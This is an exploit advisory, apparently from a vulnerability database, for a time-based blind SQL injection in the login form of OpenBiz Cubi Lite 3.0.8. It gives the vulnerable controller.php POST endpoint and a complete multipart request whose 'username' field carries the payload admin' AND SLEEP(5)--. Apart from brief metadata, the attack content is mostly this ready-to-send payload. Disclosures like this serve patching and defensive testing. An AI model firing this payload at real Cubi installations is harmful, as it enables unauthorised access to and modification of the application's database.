OpenBiz Cubi Lite 3.0.8 SQL Injection

2018.11.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection # Date: ]2018-11-05 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Contact: https://pentest.com.tr # Vendor Homepage: https://sourceforge.net/projects/bigchef/ # Software Link: https://sourceforge.net/projects/bigchef/files/latest/download # Version: v3.0.8 # Category: Webapps # Tested on: XAMPP for Linux 1.7.2 # Description: Cubi Platform login page is prone to an SQL-injection vulnerability. # Exploiting this issue could allow an attacker to compromise the application, # access or modify data, or exploit latent vulnerabilities in the underlying database. ######################################################### # PoC : SQLi : # POST : POST /bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1 # Parameter: MULTIPART username ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind # Payload: -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="username" admin' AND SLEEP(5)-- JgaK -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="password" password -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="session_timeout" Don't save session -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="session_timeout" 0 -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="current_language" English ( en_US ) -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="current_language" en_US -----------------------------71911072106778878648823492 Content-Disposition: form-data; name="btn_client_login" -----------------------------71911072106778878648823492-- ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top